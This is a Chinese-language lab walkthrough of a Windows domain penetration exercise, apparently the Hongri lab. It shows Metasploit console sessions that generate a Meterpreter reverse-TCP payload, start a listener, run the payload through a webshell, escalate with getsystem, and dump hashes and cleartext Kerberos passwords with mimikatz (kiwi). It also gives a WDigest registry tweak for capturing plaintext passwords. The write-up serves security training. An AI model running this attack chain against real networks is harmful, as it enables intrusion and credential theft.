 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.3.27-dev                          ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1382 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.196.3  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::20c:29ff:fefa:4ed4  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:fa:4e:d4  txqueuelen 1000  (Ethernet)
        RX packets 378733  bytes 504250152 (480.8 MiB)
        RX errors 81  dropped 0  overruns 0  frame 0
        TX packets 235102  bytes 13690031 (13.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000  

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.72.200  netmask 255.255.255.0  broadcast 192.168.72.255
        ether 00:0c:29:fa:4e:de  txqueuelen 1000  (Ethernet)
        RX packets 14974  bytes 7856755 (7.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7406  bytes 1188730 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 16  base 0x2400  

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 249323  bytes 34534828 (32.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 249323  bytes 34534828 (32.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf6 payload(windows/x64/meterpreter/reverse_tcp) > options

Module options (payload/windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.72.200
LHOST => 192.168.72.200
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LPORT 5555
LPORT => 5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o 64.exe
[*] Writing 7168 bytes to 64.exe...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ls -al
[*] exec: ls -al

total 184
drwxr-xr-x  14 root root  4096 May 31 21:44 .
drwxr-xr-x 348 root root 12288 Mar  4 13:35 ..
drwxr-xr-x   2 root root  4096 Mar  4 13:20 .bundle
-rw-r--r--   1 root root  7168 May 31 21:44 64.exe
-rw-r--r--   1 root root  1483 Aug 10  2023 Gemfile
-rw-r--r--   1 root root 13794 Aug 10  2023 Gemfile.lock
-rwxr-xr-x   1 root root  1316 Jul 28  2023 Rakefile
drwxr-xr-x   5 root root  4096 Mar  4 13:20 app
drwxr-xr-x   3 root root  4096 May 31 16:34 config
drwxr-xr-x  26 root root  4096 Mar  4 13:20 data
drwxr-xr-x   3 root root  4096 Mar  4 13:20 db
drwxr-xr-x   6 root root  4096 Mar  4 13:20 docs
lrwxrwxrwx   1 root root    27 Aug 10  2023 documentation -> ../doc/metasploit-framework
drwxr-xr-x  16 root root  4096 Mar  4 13:20 lib
-rw-r--r--   1 root root 10442 Aug 10  2023 metasploit-framework.gemspec
drwxr-xr-x   9 root root  4096 Mar  4 13:20 modules
-rw-r--r--   1 root root  1313 Aug 10  2023 msf-json-rpc.ru
-rw-r--r--   1 root root   427 Aug 10  2023 msf-ws.ru
-rwxr-xr-x   1 root root   798 Aug 10  2023 msfconsole
-rwxr-xr-x   1 root root  2807 Aug 10  2023 msfd
-rwxr-xr-x   1 root root  5854 Aug 10  2023 msfdb
-rwxr-xr-x   1 root root  2212 Aug 10  2023 msfrpc
-rwxr-xr-x   1 root root  9580 Aug 10  2023 msfrpcd
-rwxr-xr-x   1 root root   166 Aug 10  2023 msfupdate
-rwxr-xr-x   1 root root 14074 Aug 10  2023 msfvenom
drwxr-xr-x   2 root root  4096 Mar  4 13:20 plugins
-rwxr-xr-x   1 root root   876 Aug 10  2023 ruby
-rwxr-xr-x   1 root root   140 Aug 10  2023 script-exploit
-rwxr-xr-x   1 root root   141 Aug 10  2023 script-password
-rwxr-xr-x   1 root root   138 Aug 10  2023 script-recon
drwxr-xr-x   5 root root  4096 Mar  4 13:20 scripts
drwxr-xr-x  13 root root  4096 Mar  4 13:20 tools
drwxr-xr-x   3 root root  4096 Mar  4 13:20 vendor
msf6 payload(windows/x64/meterpreter/reverse_tcp) > pwd
[*] exec: pwd

/usr/share/metasploit-framework
msf6 payload(windows/x64/meterpreter/reverse_tcp) > 
                                                                                                                                                      

在这里插入图片描述
切换目录刷新一下,64.exe上传成功
在这里插入图片描述
kail 开启监听

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp                                                                                                
msf6 exploit(multi/handler) > options                                                                                                                 
                                                                                                                                                      
Module options (exploit/multi/handler):                                                                                                               
                                                                                                                                                      
   Name  Current Setting  Required  Description                                                                                                       
   ----  ---------------  --------  -----------                                                                                                       
                                                                                                                                                      
                                                                                                                                                      
Payload options (generic/shell_reverse_tcp):                                                                                                          
                                                                                                                                                      
   Name   Current Setting  Required  Description                                                                                                      
   ----   ---------------  --------  -----------                                                                                                      
   LHOST                   yes       The listen address (an interface may be specified)                                                               
   LPORT  4444             yes       The listen port                                                                                                  


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:5555 


在这里插入图片描述

哥斯拉运行64.exe

在这里插入图片描述
可以看到msf这边已经连上了
在这里插入图片描述

域内信息收集(GOD\Administrator )

getuid查当前用户
meterpreter > getuid
Server username: GOD\Administrator       

在 Meterpreter 中,getuid 命令用于显示当前会话的用户名。
返回了 Server username: GOD\Administrator
Server: 这里指的是目标主机或被控制的机器。
username: 这是当前 Meterpreter 会话的用户标识。
GOD\Administrator: 表示当前会话的用户是 Administrator,且该用户属于 GOD 域。
在这里插入图片描述

shell 收集信息
meterpreter > shell                                                                                                                                     
Process 4420 created.                                                                                                                                   
Channel 1 created.                                                                                                                                      
Microsoft Windows [�汾 6.1.7601]                                                                                                                        
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����                                                                                                   
                                                                                                                                                        
C:\>net config workstation                                                                                                                              
net config workstation                                                                                                                                  
��������                     \\STU1                                                                                                                     
������ȫ��                   stu1.god.org                                                                                                                
�û���                       Administrator                                                                                                               
                                                                                                                                                        
����վ��������                                                                                                                                           
        NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C29050377)                                                                               
        NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C29050381)                                                                               
        NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)                                                                               
                                                                                                                                                        
�����汾                     Windows 7 Professional                                                                                                      

����վ��                     GOD
����վ�� DNS ����            god.org
��¼��                       GOD

COM �򿪳�ʱ (��)            0
COM ���ͼ��� (��)          16
COM ���ͳ�ʱ (����)          250
�����ɹ����ɡ�


C:\>chcp 65001
chcp 65001
Active code page: 65001

C:\>net config workstation
net config workstation
Computer name                        \\STU1
Full Computer name                   stu1.god.org
User name                            Administrator

Workstation active on                
        NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C29050377)
        NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C29050381)
        NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)

Software version                     Windows 7 Professional

Workstation domain                   GOD
Workstation Domain DNS Name          god.org
Logon domain                         GOD

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
The command completed successfully.


C:\>net time /domain
net time /domain
Current time at \\owa.god.org is 2024/5/31 23:53:26

The command completed successfully.


C:\>ping owa.god.org
ping owa.god.org

Pinging owa.god.org [192.168.52.138] with 32 bytes of data:
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.52.138:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
\\STU1                                                                         
The command completed successfully.


C:\>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
\\STU1                                                                         
The command completed successfully.


C:\>ping ROOT-TVI862UBEH 
ping ROOT-TVI862UBEH 

Pinging ROOT-TVI862UBEH.god.org [192.168.52.141] with 32 bytes of data:
Reply from 192.168.52.141: bytes=32 time=7ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.52.141:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 7ms, Average = 1ms

C:\>exit
exit
meterpreter > 
                               

在这里插入图片描述

hashdump 哈希
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                               
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                          
hack01:1001:aad3b435b51404eeaad3b435b51404ee:c157e440a12221bf1facadd768c904b4:::                                                                        
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

用户名:SID:LM哈希:NTLM哈希:::
三个账号的LM哈希aad3b435b51404eeaad3b435b51404ee和NTLM哈希31d6cfe0d16ae931b73c59d7e0c089c0都是空密码。
以下内容来源AI问答:
Windows 从 Windows 10 和 Windows Server 2012 R2 版本开始,默认在内存缓存中禁止保存明文密码,密码字段显示为 null。要成功抓取明文密码,需要修改注册表,并等待用户重新登录后才能获取。具体来说,可以通过修改注册表项 HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest 下的 UseLogonCredential 值为 1 来实现。修改注册表后,需要用户注销或重新登录,以使更改生效。

在这里插入图片描述

信息整理
  • 网络上可访问的计算机列表:
    \OWA
    \ROOT-TVI862UBEH
    \STU1

  • 当前域的域控制器**:
    \owa.god.org

  • 机器的IP:
    ROOT-TVI862UBEH → [192.168.52.141]
    OWA (owa.god.org )→ [192.168.52.138]

kiwi获取Kerberos 票据

kiwi 是什么??
  • 以下内容来源AI问答:

“Kiwi” 在这里指的是 mimikatz 的别称,因为 mimikatz 的开发者 Benjamin DELPY 的网名是 “gentilkiwi”。因此,在安全社区中,人们有时会亲切地将 mimikatz 称为 “kiwi”。
mimikatz 是一款在安全研究和渗透测试领域广泛使用的开源工具,它主要用于 Windows 系统。mimikatz 能够执行多种与凭证访问和凭证转储相关的操作,包括但不限于:

  • 从内存中提取 Windows 凭据。
  • 转储登录密码。
  • 模拟登录令牌。
  • 从 LSA 内存中提取密码哈希。
  • 创建和使用 Kerberos 票据。
猕猴桃(GOD\Administrator 提示非系统)

在 Meterpreter 会话中,加载 mimikatz 扩展(通过 load kiwi 命令)允许用户直接在会话中执行 mimikatz 的各种功能。这为渗透测试人员提供了一个强大的工具,以帮助他们评估目标系统的安全性。

meterpreter > getuid                                                                                                                                    
Server username: GOD\Administrator                                                                                                                      
meterpreter > load kiwi
Loading extension kiwi...                                                                                                                               
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)                                                                                                                                                
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                                                                                                      
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                                                                                                         
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                                                                                                                                           
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )                                                                                                                        
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/                                                                                                                        
                                                                                                                                                                                                 
Success.                                                                                                                                                                                         
meterpreter > help        

getuid显示当前服务器的名字是GOD\Administrator
kiwi集成了猕猴桃,help可查看执行命令。注:这里指令太多不截图。

在这里插入图片描述

meterpreter > creds_all 
[!] Not running as SYSTEM, execution may fail
meterpreter > 

creds_all 检索解析过的票据,提示不是系统,记住现在getuid显示的是GOD\Administrator 。后面会调用msf进行提权。

在这里插入图片描述

Windows 系统中的用户账户
  • 以下内容来源AI问答:

NT AUTHORITY\SYSTEMGOD\Administrator 是 Windows 系统中的两种不同类型的用户账户,它们具有不同的含义和权限级别:

  1. NT AUTHORITY\SYSTEM:
  • 这是 Windows 系统中一个特殊的安全主体,代表操作系统本身。
  • SYSTEM 账户是 Windows 系统中权限最高的账户之一,通常用于执行系统级别的任务和操作。
  • 它通常不是域的一部分,而是本地计算机账户。
  • SYSTEM 账户具有对整个系统完全的控制权,包括访问所有文件、注册表项、启动和停止服务等。

  1. GOD\Administrator:
  • 这表示一个名为 Administrator 的用户账户,属于名为 GOD 的域或工作组。
  • Administrator 是一个常见的内置账户名称,通常用于系统管理任务。
  • 在域环境中,Administrator 可能是域管理员账户,拥有管理整个域的权限。
  • 在工作组环境中,Administrator 可能是工作组内某台计算机的管理员账户,拥有管理该计算机的权限。
  • 权限级别取决于账户所在的域或工作组,以及该账户是否是管理员。

主要区别:

  • 账户类型: NT AUTHORITY\SYSTEM 是一个本地或域的系统账户,而 GOD\Administrator 是一个域或工作组中的用户账户。
  • 权限范围: SYSTEM 账户通常具有对单个系统的完全控制权,而 Administrator 账户的权限可能跨越多台计算机,具体取决于它所在的域或工作组。
  • 用途: SYSTEM 账户通常用于系统级别的操作和维护,而 Administrator 账户用于管理用户账户、系统设置和执行管理任务。
  • 安全性: 由于 SYSTEM 账户具有极高的权限,通常不会用于日常操作,以减少安全风险。Administrator 账户虽然权限也很高,但更常用于管理任务。
    在安全操作和渗透测试中,识别当前会话或操作的用户上下文是很重要的,因为这决定了你可以执行哪些操作以及如何提升权限或维持访问。
msf(权限提升到 SYSTEM 级别)+ 猕猴桃(获取kbs)

上面getuid显示的是GOD\Administrator ,这个时候想抓票据,提示Not running as SYSTEM, execution may fail,表明当前的会话或执行环境不是以 SYSTEM 用户权限运行的。

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
[-] Error running command creds_all: ActiveRecord::RecordInvalid Validation failed: Data is not in the NTLMHash data format of <LAN Manager hex digest>:<NT LAN Manager hex digest>, where each hex digest is 32 lowercase hexadecimal characters.
meterpreter > creds_kerber
[-] Unknown command: creds_kerber
meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  2024@hongri
hack01         STU1     1324@cbD
stu1$          GOD.ORG  d6 87 2c c5 8d 76 4f d6 6b 64 a7 26 c4 46 a4 d8 9b 2e ef 83 01 75 72 bb 39 54 d1 d3 2b de f9 26 b0 3c 47 18 b7 17 1e cf 14 79 5f 9b ec 75 05 05 bb 70 31 e9 fb c8 17 02 1e 96 86 86 a0
                        ff a4 c8 26 14 25 b5 6c 68 9e 66 97 9d e8 7e cf a4 5d e8 63 1d aa 35 cd ae 24 01 90 ab 74 83 1a 00 13 b5 73 f9 55 5b 71 77 dd 9d 5e be 00 8f db fe c2 e4 2c 51 a4 f8 d8 de 4c 3a 8d bb
                        4a 16 a4 f1 18 b3 8d c5 f7 98 8c cc 2c 6f a3 ab f3 d0 31 90 dd 52 dd 37 f3 d1 01 12 fd 16 71 3a 0a 11 3a 8e b8 9f 7c ac e6 01 c7 21 7a 39 e2 76 16 05 dd 08 8d d1 95 7c f5 0f 10 8b f6
                        6a b3 41 b1 e6 b6 da 86 23 fa d8 e0 94 bc 7f e9 bc 52 eb 49 2c 1c 02 b0 3d aa 81 59 f7 37 07 88 26 d3 45 df 2f 0c d6 d4 db cb 55 91 24 e1 dd 05 89 73 ec ee af 1c 91 38 cc


meterpreter > 


msf 命令 getsystem 尝试将当前会话的权限提升到 SYSTEM 级别。
SYSTEM 是 Windows 系统中权限最高的用户账户,拥有对系统完全的控制权。
getsystem提权后,getuid发生了变化: NT AUTHORITY\SYSTEM.
creds_kerberos 检索 Kerberos 凭据(解析过的),成功拿到检索 Kerberos 凭据,密码2024@hongri。

在这里插入图片描述

shell(\system)验证Administrator是否域管理员

猜测Administrator是域管理员,需要进入shell验证下。

meterpreter > shell
Process 4616 created.                                                                                                                
Channel 2 created.                                                                                                                   
Microsoft Windows [�汾 6.1.7601]                                                                                                     
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����                                                                                
                                                                                                                                     
C:\Windows\system32>chcp 65001                                                                                                       
chcp 65001                                                                                                                           
Active code page: 65001                                                                                                              
                                                                                                                                     
C:\Windows\system32>whoami                                                                                                           
whoami                                                                                                                               
nt authority\system                                                                                                                  
                                                                                                                                     
C:\Windows\system32>net group "domain admins" /domain                                                                                
net group "domain admins" /domain                                                                                                    
The request will be processed at a domain controller for domain god.org.                                                             
                                                                                                                                     
Group name     Domain Admins                                                                                                         
Comment        ����������Ա                                                                                                           

Members

-------------------------------------------------------------------------------
Administrator            OWA$                     
The command completed successfully.


C:\Windows\system32>exit
exit

在这里插入图片描述

  • 以下内容来源AI问答:

在这个 Meterpreter 会话中,执行了 shell 命令以打开一个 Windows 命令行 shell。以下是执行的命令和获取到的信息:

  1. chcp 65001:
    • 这个命令将控制台的代码页更改为 65001,也就是 UTF-8 编码。这样做可以确保正确显示字符,避免乱码。
  2. whoami:
    • whoami 命令显示当前用户的身份。输出 nt authority\system 表明当前会话是以 Windows 系统中权限最高的 SYSTEM 用户身份运行的。
  3. net group “domain admins” /domain:
    • net group "domain admins" /domain 命令用于显示域 god.org 中 “Domain Admins” 组的信息。输出显示了该组的成员,包括 “Administrator” 和 "OWA " ( O W A "(OWA "OWA 通常代表 Outlook Web Access 服务账户)。
  4. exit:
    • exit 命令用于退出当前的 Windows 命令行 shell 并返回到 Meterpreter 会话。

通过这些命令,可以获取以下信息:

  • 会话已经获得了 SYSTEM 级别的访问权限,这是 Windows 系统中最高的权限级别。
  • “Domain Admins” 组的成员信息,这对于了解域环境中的高权限账户非常重要。
  • 域的名称是 god.org,这是一个组织内部用于身份验证和资源管理的域。

猜测验证完毕。

MSF进程注入(迁移到GOD\Administrator)

MSF进程注入前提:需要生成一个木马让其上线,让攻击机连接上去,这里前面已经生成好的木马连上了,略。

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System             x64   0
 156   3012  phpStudy.exe       x86   1        GOD\Administrator             C:\phpStudy\phpStudy.exe
 252   4     smss.exe           x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 332   488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 336   328   csrss.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 388   328   wininit.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 396   380   csrss.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 412   488   SearchIndexer.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 432   380   winlogon.exe       x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 488   388   services.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 504   388   lsass.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 512   388   lsm.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 628   488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 688   488   vmacthlp.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 720   488   svchost.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 776   488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 816   396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 916   488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 956   488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 972   2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 1076  488   svchost.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 1208  488   spoolsv.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1252  488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1272  488   msdtc.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 1300  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 1328  4764  Everything.exe     x64   2        STU1\hack01                   C:\Program Files\Everything\Everything.exe
 1372  3440  64.exe             x64   1        GOD\Administrator             C:\64.exe
 1400  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 1408  488   openvpnserv.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\OpenVPN\bin\openvpnserv.exe
 1500  488   VGAuthService.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGA
                                                                             uthService.exe
 1532  488   vmtoolsd.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1684  488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1696  2156  conhost.exe        x64   2        STU1\hack01                   C:\Windows\system32\conhost.exe
 1700  4764  openvpn-gui.exe    x64   2        STU1\hack01                   C:\Program Files\OpenVPN\bin\openvpn-gui.exe
 1712  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 1776  628   WmiPrvSE.exe       x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\wbem\wmiprvse.exe
 1784  488   svchost.exe        x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1840  4160  winlogon.exe       x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 1892  4592  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 2004  4104  64.exe             x64   1        GOD\Administrator             C:\64.exe
 2052  156   httpd.exe          x86   1        GOD\Administrator             C:\phpStudy\Apache\bin\httpd.exe
 2088  3012  vmtoolsd.exe       x64   1        GOD\Administrator             C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2096  3012  Everything.exe     x64   1        GOD\Administrator             C:\Program Files\Everything\Everything.exe
 2136  3012  openvpn-gui.exe    x64   1        GOD\Administrator             C:\Program Files\OpenVPN\bin\openvpn-gui.exe
 2156  1648  csrss.exe          x64   2        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 2416  488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2732  156   mysqld.exe         x86   1        GOD\Administrator             C:\phpStudy\MySQL\bin\mysqld.exe
 2760  488   sppsvc.exe         x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\sppsvc.exe
 2796  488   taskhost.exe       x64   1        GOD\Administrator             C:\Windows\system32\taskhost.exe
 2820  2052  httpd.exe          x86   1        GOD\Administrator             C:\phpStudy\Apache\bin\httpd.exe
 2952  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 2988  916   dwm.exe            x64   1        GOD\Administrator             C:\Windows\system32\Dwm.exe
 3012  2980  explorer.exe       x64   1        GOD\Administrator             C:\Windows\Explorer.EXE
 3244  1840  LogonUI.exe        x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 3304  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 3364  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 3396  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 3440  972   cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 3620  628   slui.exe           x64   2        STU1\hack01                   C:\Windows\System32\slui.exe
 3672  1648  winlogon.exe       x64   2        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 3776  488   svchost.exe        x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 3796  488   svchost.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3912  4008  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 4008  4000  firefox.exe        x86   1        GOD\Administrator             C:\Program Files (x86)\Mozilla Firefox\firefox.exe
 4104  4296  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4136  4160  csrss.exe          x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 4296  2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4304  488   taskhost.exe       x64   2        STU1\hack01                   C:\Windows\system32\taskhost.exe
 4368  5048  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4376  1892  64.exe             x64   1        GOD\Administrator             C:\64.exe
 4384  1076  rdpclip.exe        x64   2        STU1\hack01                   C:\Windows\system32\rdpclip.exe
 4592  2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 4712  916   dwm.exe            x64   2        STU1\hack01                   C:\Windows\system32\Dwm.exe
 4756  1328  Everything.exe     x64   2        STU1\hack01                   C:\Program Files\Everything\Everything.exe
 4760  3796  WerFault.exe       x64   1        GOD\Administrator             C:\Windows\system32\WerFault.exe
 4764  4704  explorer.exe       x64   2        STU1\hack01                   C:\Windows\Explorer.EXE
 4800  4368  64.exe             x64   1        GOD\Administrator             C:\64.exe
 4876  396   conhost.exe        x64   1        GOD\Administrator             C:\Windows\system32\conhost.exe
 4976  4764  vmtoolsd.exe       x64   2        STU1\hack01                   C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 5048  2820  cmd.exe            x86   1        GOD\Administrator             C:\Windows\SysWOW64\cmd.exe
 5080  4764  cmd.exe            x64   2        STU1\hack01                   C:\Windows\system32\cmd.exe

meterpreter > migrate 2820
[*] Migrating from 1372 to 2820...
[*] Migration completed successfully.
meterpreter > getuid
Server username: GOD\Administrator
meterpreter > 
                     

当前还是系统状态NT AUTHORITY\SYSTEMps查看所有进程以及相应的权限。
migrate PID 迁移进程,这个pid是你选择进程的id号,这里我选了http,能转到GOD\Administrator

在这里插入图片描述

进程迁移成功,getuid发生了改变GOD\Administrator

在这里插入图片描述

shell验证GOD\Administrator账户权限

在这里插入图片描述

这里能看到GOD\Administrator是有权限访问另外两台机子的信息的,进一步验证我们的猜测。
GOD\Administrator有域管理员权限,rdesktop远程显示已登录。

在这里插入图片描述

快照------------------------------------------------------------

win7 和kail,快照,也可以所有都打

